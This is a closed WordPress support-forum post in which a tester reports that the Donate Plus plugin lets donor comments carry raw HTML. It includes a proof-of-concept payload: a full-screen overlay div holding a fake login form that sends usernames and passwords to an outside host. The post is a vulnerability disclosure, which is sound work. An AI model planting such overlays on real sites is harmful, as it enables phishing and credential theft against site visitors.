I was testing this plug-in and found that I was able to embed potentially malicious html in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form name="login" action="http://aspectsecurity.com"><table><tr><td>Username: </td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form><img</div>
I inserted this html through the wordpress backend but assume there is no validation to prevent this.
- The topic ‘[Plugin: Donate Plus] Potentially Malicious HTML allowed in donor comments’ is closed to new replies.